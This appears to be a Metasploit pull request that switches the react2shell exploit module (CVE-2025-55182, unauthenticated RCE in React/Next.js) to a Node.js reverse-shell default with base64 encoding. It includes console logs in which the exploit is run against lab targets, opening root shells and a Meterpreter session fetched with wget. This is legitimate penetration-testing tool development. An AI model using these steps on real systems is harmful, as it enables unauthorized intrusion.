Change react2shell default encoder and payload

[jheysel-r7]

This PR changes the default payload for the react2shell module to use a nodejs payload. This will help pro users as previously the module was defaulting to an aarch64 payload and was not honoring the default value set for the FETCH_COMMAND datastore option. I believe this was what was requested as a temporary fix for these issues.

The module was hitting a payload length limitation when using cmd/unix/reverse_nodejs. Due to the badchar => '"' the payload needs to be encoded. The EncoderType selected by default was CmdPosixEcho which generates quite a large payload as each byte is sent as a \x prefixed hex encoded string: /bin/echo -ne '\x6e\x6f\x64\x65....

Explicitly setting the EncoderType to CmdPosixBase64 is much more efficient: echo bm9kZSAtZSAn....

When first attempting to minimize the payload size the #nodejs_cmd method was changed to only encoding chars that are not whitespace or alpha numeric. This significantly reduced the size of the payload and should probably stay in this PR.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use multi/http/react2shell_unauth_rce_cve_2025_55182
• set rhosts, rport, lhost
• run the module
• Verify you get a session

Testing

msf > use multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using configured payload cmd/unix/reverse_nodejs
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set rport 3000
rport => 3000
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > options

Module options (exploit/multi/http/react2shell_unauth_rce_cve_2025_55182):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to the React App
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_nodejs):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run
[*] Started reverse TCP handler on 172.16.199.1:4000
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (172.16.199.1:4000 -> 172.16.199.1:61025) at 2025-12-12 15:43:26 -0800
id

uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
uname -a
Linux 22471a211b95 6.12.54-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Nov  4 21:39:03 UTC 2025 x86_64 Linux
^C
Abort session 1? [y/N]  yy

[*] 127.0.0.1 - Command shell session 1 closed.  Reason: User exit

[jvoisin]

Why not 'multi'?

[jheysel-r7]

Although it's placed in the exploits/multi folder, the platforms should be explicitly defined like so

[smcintyre-r7]

Changes LGTM. Tested the new defaults with the docker container along with the older Meterpreter using the fetch payload. Switching to nodejs by default makes sense.

Metasploit tip: Use post/multi/manage/autoroute to automatically add 
pivot routes
                                                  

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


       =[ metasploit v6.4.103-dev-ff188b8a5e                    ]
+ -- --=[ 2,584 exploits - 1,319 auxiliary - 1,694 payloads     ]
+ -- --=[ 433 post - 49 encoders - 14 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

WARNING: Local file /home/smcintyre/Repositories/metasploit-framework/data/meterpreter/ext_server_stdapi.php is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/smcintyre/Repositories/metasploit-framework/data/meterpreter/ext_server_stdapi.py is being used
WARNING: Local file /home/smcintyre/Repositories/metasploit-framework/data/meterpreter/meterpreter.php is being used
WARNING: Local file /home/smcintyre/Repositories/metasploit-framework/data/meterpreter/meterpreter.py is being used
msf payload(php/meterpreter/reverse_tcp) > use react2shell

msf payload(php/meterpreter/reverse_tcp) > use react2shell

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/react2shell_unauth_rce_cve_2025_55182  2025-12-03       excellent  Yes    Unauthenticated RCE in React and Next.js
   1    \_ target: Unix Command                                 .                .          .      .
   2    \_ target: Windows Command                              .                .          .      .


Interact with a module by name or index. For example info 2, use 2 or use exploit/multi/http/react2shell_unauth_rce_cve_2025_55182
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command'

[*] Using exploit/multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using configured payload cmd/unix/reverse_nodejs
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > show options 

Module options (exploit/multi/http/react2shell_unauth_rce_cve_2025_55182):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h,
                                          http, sapni, socks4
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
                                         .html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to the React App
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_nodejs):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.

msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set RPORT 3000
sRPORT => 3000
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (192.168.159.128:4444 -> 192.168.159.128:43530) at 2025-12-15 14:58:05 -0500

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
pwd
/app
^C
Abort session 1? [y/N]  y

[*] 192.168.159.128 - Command shell session 1 closed.  Reason: User exit
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run FETCH_COMMAND=wget
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (3090404 bytes) to 192.168.159.128
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:50692) at 2025-12-15 14:59:38 -0500

meterpreter > getuid
sysinServer username: root
meterpreter > sysinfo
Computer     : 192.168.250.227
OS           :  (Linux 6.17.10-300.fc43.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down session: 2

[*] ::1 - Meterpreter session 2 closed.  Reason: Died
[*] ::1 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) 

[smcintyre-r7]

Release Notes

This updates the exploit for React2Shell with a better default payload.